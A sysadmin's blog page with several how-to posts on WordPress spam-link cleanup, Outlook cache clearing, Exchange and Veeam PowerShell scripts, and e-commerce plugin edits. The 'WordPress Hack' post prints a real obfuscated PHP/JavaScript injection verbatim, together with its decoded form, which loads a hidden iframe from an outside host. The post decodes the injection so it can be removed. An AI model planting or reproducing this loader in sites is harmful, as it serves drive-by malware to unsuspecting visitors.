paydayloanscamRecently a wordpress site had multiple SQL injections into the content randomly throughout the 100 or so blog posts as per right. These included generic keywords such as :

  • levitra
  • cialis
  • payday
  • viagra
  • pharmacy
  • pfizer

The sites it linked to where :

http://masagro.mx/index.php/en/payday-loans-in-goldsboro-nc
http://simlesa.cimmyt.org/index.php/payday-loans-indiana
http://www.redclara.net/generic-viagra-us/
http://greatvines.com/cialis-online-fda
http://www.crackunit2.com/purchase-cheap-levitra/

Going through these with Search and Replace plugin was going to take ages , so I tried to look for a regex script. I can across the following , curtious of https://managewp.com/clean-link-injections-hacked-websites however this only looked for cetrain Div Tags. I needed something to remove Hyperlinks containing the above keywords. I modified the code to the below and placed into the functions.php file and ran with preview on then off and went through the keyword list. Cleared about 1000 links!!

//Enter keyword below to check for in hyperlinks ( the whole link )
    $spamkeyword = "spamkeyword";
 
    // By default only preview infected posts. Change to 0 to clean posts
    $preview_only = 1;
 
    // This is the pattern to search and replace with blank
    $pattern = '%<a href=[\"\'][^"]*?'.$spamkeyword.'.*?[\"\']>.*?</a>%';
 
    // This is the query to find suspicious posts using fast SQL query
    $query="SELECT ID, post_content from $wpdb->posts where post_content LIKE '%$spamkeyword%'";
 
    global $wpdb;
    $num_cleaned = 0;
 
    $posts = $wpdb->get_results($query);
 
    echo "Suspicious: ".count($posts)." ";
 
    if ($preview_only)
      echo "Post IDs: ";
 
    // go through all suspicious posts
    foreach ($posts as $post)
//echo   $post->post_content;
    {
        if (!$preview_only)
        {
            // try the pattern
            $new_content=preg_replace($pattern, '',  $post->post_content);
 
            // update the cleaned content
            if ($new_content!=$post->post_content) {
              $wpdb->update(
                $wpdb->posts,
                array(
                    'post_content' => $new_content
                ),
                array( 'ID' => $post->ID ));
 
                $num_cleaned++;
            }      
        }
        else echo $post->ID." ";
 
    //UnComment Below to See Results of Preview before comitting
    //echo preg_replace($pattern, '',  $post->post_content);
    }
 
    if (!$preview_only)
      echo "Cleaned: $num_cleaned";

 

regex Upon searching for help with this , I did have to smile at the irony of the Regex Help Website being hacked in the same fashion , although obviously all clear now!

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Can't-open-this-itemWhen opening email from a Find / Search in Outlook 2003 you get “can’t open this item”

Is you use custom forms this is due to the custom form cache filling up and needing to be cleared , below code will do this is you copy and paste it into a VBS file

'Robert Sparnaaij [MVP-Outlook]
'http://www.howto-outlook.com

 
 
'Close Outlook socially
WScript.Echo "Close Outlook and press OK"
 
'Close Outlook forcefully
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = 'outlook.exe'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
 
'Set Profile Path
Set oShell = CreateObject("WScript.Shell") 
sCurrUsrPath = oShell.ExpandEnvironmentStrings("%UserProfile%")
Set objFSO = CreateObject("Scripting.FileSystemObject")
 
'Verify whether the Forms Cache exists and delete it 
If objFSO.FolderExists(sCurrUsrPath & "\Local Settings\Application Data\Microsoft\Forms") Then
      WScript.Echo "The Forms Cache has been found and will be cleared."
      Const DeleteReadOnly = True
      objFSO.DeleteFolder(sCurrUsrPath & "\Local Settings\Application Data\Microsoft\Forms"), DeleteReadOnly
      WScript.Echo "The Forms Cache has been cleared succesfully. Start Outlook and check whether the form works now."
 
  Else
 
WScript.Echo "Cannot find the Forms Cache. It has been cleared already. Start Outlook and check whether the form works now."
 
End If

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Needed to check all users who had SEND AS Permissions for someone else in the Exchange Enviroment apart from themselves and e.g. BESADMIN or other service accounts. Below is the command line

Get-Mailbox -Resultsize Unlimited | Get-ADPermission | ? {($_.ExtendedRights -like "*send-as*") -and -not ($_.User -like "nt authority\self") -and -not ($_.User -like "Domain\BESAdmin") -and -not ($_.User -like "domain\user")} | ft Identity, User -auto

As per the track back , can be limited to a specific OU

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

**Update**

Upon the below , I actually experienced this again , when I couldn’t break the Group down to members and add to another group. The issue was this group was a legacy Distribution Group from 2003 that just needed resetting per below ( with it’s correct details ) :

Set-DistributionGroup -Identity "Accounting" -DisplayName "Accounting Group"

**Old Fix**

I was trying to add group to group permissions in Exchange so all members of one group would have access to another groups Inbox and was getting the following error

“found in Active Directory but isn’t valid to use for permissions”

Powershell Code as below, I set the DistGrouptohavePermission to an SMTP email address of the group as well as confirming it was a Universal Security Group and it still came up with the error.

I then changed the DistGrouptohavePermission value to the MailNickName of the Group ( can be found in the Extended Attributes ) and it went through OK

# change to prefered accessrights (see "Get-Help Set-MailboxFolderPermission -Parameter AccessRights")
$accessrights = "Editor"
 
# set Identity to distributiongroup alias
$distributiongroup = Get-DistributionGroup -Identity "GroupWillAllTheUsers"
 
# normally no changing after this line
$groupmembers = Get-DistributionGroupMember -Identity $distributiongroup | Where-Object { $_.RecipientType -eq "UserMailbox" }
foreach ( $member in $groupmembers )
{
	$permissions = ""
	$mailbox = Get-Mailbox -Identity $member.alias
	$inbox = (($mailbox.SamAccountName) + ":\" + (Get-MailboxFolderStatistics -Identity $mailbox.SamAccountName -FolderScope Inbox | Select-Object -First 1).Name)
 
	foreach ( $perm in ( Get-MailboxFolderPermission -Identity $inbox ))
	{
		$permissions += @($perm.User.DisplayName)
	}
 
	if ( $permissions -contains $distributiongroup.Name )
	{
		# Distributiongroup already has permission groupmember inbox
		Set-MailboxFolderPermission -Identity $mailbox.SamAccountName -User "DistGrouptohavePermission" -AccessRights $accessrights
		Set-MailboxFolderPermission -Identity $inbox -User "DistGrouptohavePermission" -AccessRights $accessrights
	}
	else
	{
		# Distributiongroup has no permission to groupmember inbox
                Add-MailboxFolderPermission -Identity $mailbox.SamAccountName -User "DistGrouptohavePermission" -AccessRights $accessrights
		Add-MailboxFolderPermission -Identity $inbox -User "DistGrouptohavePermission" -AccessRights $accessrights
	}
}
VN:F [1.9.22_1171]
Rating: 3.0/10 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

WordPress Hack

Recently a customer’s site was hacked from an out of date plugin. The hack was pretty cool and took me a few hours to decipher

The hack entailed entering the following PHP code in the header of each file with the body tag

<?php#a9a007#                                                                                                                                                                                                                                                          if(empty($rixmc)) {$rixmc = "<script type=\"text/javascript\" language=\"javascript\">nvbbm=\"fr\"+\"omCh\"+\"ar\"+\"Co\"+\"de\";if(document.querySelector)wtesq=4;iymigs=(\"5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,9f,aa,a5,aa,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,9f,aa,a5,aa,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,9f,aa,a5,aa,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b5,b5,b5,6c,ac,a3,b5,b2,a3,a1,a6,a7,ac,a4,ad,b0,ab,9f,b2,a7,a1,9f,6c,a7,b2,6d,84,a8,94,95,85,a6,a5,b0,6c,ae,a6,ae,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,ae,ad,b1,a7,b2,a7,ad,ac,5e,7b,5e,65,9f,a0,b1,ad,aa,b3,b2,a3,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a1,ad,aa,ad,b0,5e,7b,5e,65,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a6,a3,a7,a5,a6,b2,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b5,a7,a2,b2,a6,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,aa,a3,a4,b2,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b2,ad,ae,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,4b,48,5e,a7,a4,5e,66,5f,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,67,5e,b9,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,b5,b0,a7,b2,a3,66,65,7a,ae,5e,a7,a2,7b,9a,65,9f,aa,a5,aa,9a,65,5e,a1,aa,9f,b1,b1,7b,9a,65,9f,aa,a5,aa,6e,77,9a,65,5e,7c,7a,6d,ae,7c,65,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,6c,9f,ae,ae,a3,ac,a2,81,a6,a7,aa,a2,66,9f,aa,a5,aa,67,79,4b,48,5e,bb,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,91,a3,b2,81,ad,ad,a9,a7,a3,66,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,6a,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,6a,ac,82,9f,b7,b1,6a,ae,9f,b2,a6,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b2,ad,a2,9f,b7,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,b4,9f,b0,5e,a3,b6,ae,a7,b0,a3,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,a7,a4,5e,66,ac,82,9f,b7,b1,7b,7b,ac,b3,aa,aa,5e,ba,ba,5e,ac,82,9f,b7,b1,7b,7b,6e,67,5e,ac,82,9f,b7,b1,7b,6f,79,4b,48,5e,a3,b6,ae,a7,b0,a3,6c,b1,a3,b2,92,a7,ab,a3,66,b2,ad,a2,9f,b7,6c,a5,a3,b2,92,a7,ab,a3,66,67,5e,69,5e,71,74,6e,6e,6e,6e,6e,68,70,72,68,ac,82,9f,b7,b1,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,5e,7b,5e,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,69,60,7b,60,69,a3,b1,a1,9f,ae,a3,66,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,67,4b,48,5e,69,5e,60,79,a3,b6,ae,a7,b0,a3,b1,7b,60,5e,69,5e,a3,b6,ae,a7,b0,a3,6c,b2,ad,85,8b,92,91,b2,b0,a7,ac,a5,66,67,5e,69,5e,66,66,ae,9f,b2,a6,67,5e,7d,5e,60,79,5e,ae,9f,b2,a6,7b,60,5e,69,5e,ae,9f,b2,a6,5e,78,5e,60,60,67,79,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,85,a3,b2,81,ad,ad,a9,a7,a3,66,5e,ac,9f,ab,a3,5e,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b0,b2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,ac,9f,ab,a3,5e,69,5e,60,7b,60,5e,67,79,4b,48,5e,b4,9f,b0,5e,aa,a3,ac,5e,7b,5e,b1,b2,9f,b0,b2,5e,69,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,69,5e,6f,79,4b,48,5e,a7,a4,5e,66,5e,66,5e,5f,b1,b2,9f,b0,b2,5e,67,5e,64,64,4b,48,5e,66,5e,ac,9f,ab,a3,5e,5f,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,6e,6a,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,67,5e,67,5e,67,4b,48,5e,b9,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,bb,4b,48,5e,a7,a4,5e,66,5e,b1,b2,9f,b0,b2,5e,7b,7b,5e,6b,6f,5e,67,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,b4,9f,b0,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,60,79,60,6a,5e,aa,a3,ac,5e,67,79,4b,48,5e,a7,a4,5e,66,5e,a3,ac,a2,5e,7b,7b,5e,6b,6f,5e,67,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,aa,a3,ac,a5,b2,a6,79,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,b3,ac,a3,b1,a1,9f,ae,a3,66,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,aa,a3,ac,6a,5e,a3,ac,a2,5e,67,5e,67,79,4b,48,bb,4b,48,a7,a4,5e,66,ac,9f,b4,a7,a5,9f,b2,ad,b0,6c,a1,ad,ad,a9,a7,a3,83,ac,9f,a0,aa,a3,a2,67,4b,48,b9,4b,48,a7,a4,66,85,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,9f,aa,a5,aa,6e,77,66,67,79,4b,48,bb,4b,48,bb\".split(\",\"));lldu=window[\"asdeval\".substr(3)];function kwstn(){uvt=function(){--(crq.body)}()}crq=document;for(atodfh=0;atodfh<iymigs[\"length\"];atodfh+=1){iymigs[atodfh]=-(62)+parseInt(iymigs[atodfh],wtesq*4);}try{kwstn()}catch(hno){kqxto=50-50;}if(!kqxto)lldu(String[nvbbm].apply(String,iymigs));</script>";echo $rixmc;}#/a9a007#?>

This file then creating an iFrame which linked to another php file.

As you can see the code its really ciphered to stop detection however thanks to StopBadware.org , it was logged and alerted.

The below works by using 2 functions

1) -(62)+parseInt(iymigs[atodfh],wtesq*4). As you can see below wtesq is declared to be 4 so this changes to -(62)+parseInt(iymigs[atodfh]16). This gets Java script to change the bolded string values into radix 16 values minus 62. Here’s some PHP to do this

<?php
 
$str = "%the string with commas removed%";
 
$hex = str_split($str, 2);
 
foreach ($hex as $value) {
    echo -(62)+intval("$value", 16);
    echo ", ";
 
}
 
?>

2) Cleverly hidden in \”fr\”+\”omCh\”+\”ar\”+\”Co\”+\”de\ gives you “fromCharCode” , so the values of this can be inserted into this online tool

http://jdstiles.com/java/cct.html

Which then gives us the code

function algl09() {
 var static='ajax';
 var controller='index.php';
 var algl = document.createElement('iframe');
 
 algl.src = 'http://www.newtechinformatica.it/FjVWGhgr.php';
 algl.style.position = 'absolute';
 algl.style.color = '98';
 algl.style.height = '98px';
 algl.style.width = '98px';
 algl.style.left = '100098';
 algl.style.top = '100098';
 
 if (!document.getElementById('algl')) {
 document.write('<p id=\'algl\' class=\'algl09\' ></p>');
 document.getElementById('algl').appendChild(algl);
 }
}
function SetCookie(cookieName,cookieValue,nDays,path) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;
 expire.setTime(today.getTime() + 3600000*24*nDays);
 document.cookie = cookieName+"="+escape(cookieValue)
 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
 var start = document.cookie.indexOf( name + "=" );
 var len = start + name.length + 1;
 if ( ( !start ) &&
 ( name != document.cookie.substring( 0, name.length ) ) )
 {
 return null;
 }
 if ( start == -1 ) return null;
 var end = document.cookie.indexOf( ";", len );
 if ( end == -1 ) end = document.cookie.length;
 return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
 
algl09();
}
}

To clean the exploit remove this off the header.php in WordPress and also clear up and HTML/PHP files in the root directory the hacker has created

 

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

box_backup_vmware[1]We use Veam to backup our servers. Veam uses snapshots to copy the whole machine which can then get copied to disk to be backed up to tape. Sometimes due to changes on the servers through the night the Veam backup job overruns. When a backup is initialy created removed it can put strain on the disks and also take it offline. So when a job overruns it can take the server down during production.

Here is a powershell script which is run first thing in the morning so we know via email if we need to warn the business or cancel a backup of any issues!

Run this script on the machine with Veam installed, recommend you install PowerShell Version 3. Replace %xxx% values with your correct one!

asnp VeeamPSSnapin -ErrorAction SilentlyContinue
$PSEmailServer = "%ExchangeServer%"
$Activejobs = Get-VBRJob | ?{$_.GetLastState() -eq "Working"}
foreach($jobs in $Activejobs)
{
Send-MailMessage -From "%emailfrom@domain.com%" -to %emailto@domain.com% -Subject "Veam Job Still Running" -Body $jobs.name
}

 

To turn a powershell .ps1 script into a sheduled task do the following :

Run this program for the task: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and Add the location of the ps1 script as the argument of the scheduled task

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

A customer wanted to show visitors when the last modification to the whole wordpress site was on the home page. There’s a function in WordPress which give you the function to the current post or page which is :

the_modified_time('F j, Y');

However to find out the whole site, you need to do the current MySQL Query :

$last_site_update = $wpdb->get_var( "SELECT post_modified FROM $wpdb->posts WHERE post_status = 'publish' ORDER BY post_modified DESC LIMIT 1" );

Then you can formulate it with PHP’s Date Function e.g. : echo date(‘F j, Y’, strtotime($last_site_update));

 

 

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

As per title , the wordpress plugin Per Page Sidebars does not work when you enable a widget for 2 pages which have same names. I was building a site which had duplicate children page names for multiple parents.

I modified the plugin to register the widgets from PSS-Name-of-Page to PSS-Name-of-Parent-Name-of-Page

This enabled me to have multiple widgets for pages by the same name , and also an easy way to organise the widgets in the backend. Code modify in the per-page-sidebars.php file

 

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Go into /wpsc-theme/functions/wpsc-transaction_results_functions.php

Comment out the following

wp_mail( $email, __( 'Order Pending: Payment Required', 'wpsc' ), $message );
 
wp_mail( $email, __( 'Purchase Receipt', 'wpsc' ), $message );
 
wp_mail( get_option( 'purch_log_email' ), __( 'Purchase Report', 'wpsc' ), $report );
VN:F [1.9.22_1171]
Rating: 5.0/10 (2 votes cast)
VN:F [1.9.22_1171]
Rating: -1 (from 1 vote)

The page here has a solution however it doesn’t work : http://wpquestions.com/question/show/id/1840 and the topic is closed hence for this post!

You need to edit this file : wpsc-transaction_results.php

I placed my code after the true statment for correct purchase

if ( ( true === $echo_to_screen ) && ( $cart != null ) && ( $errorcode == 0 ) && ( $sessionid != null ) ) {            
The value you need is $cart[0][prodid];

There are 2 array’s you can get information from $purchase_log and $cart

 

 

VN:F [1.9.22_1171]
Rating: 3.0/10 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)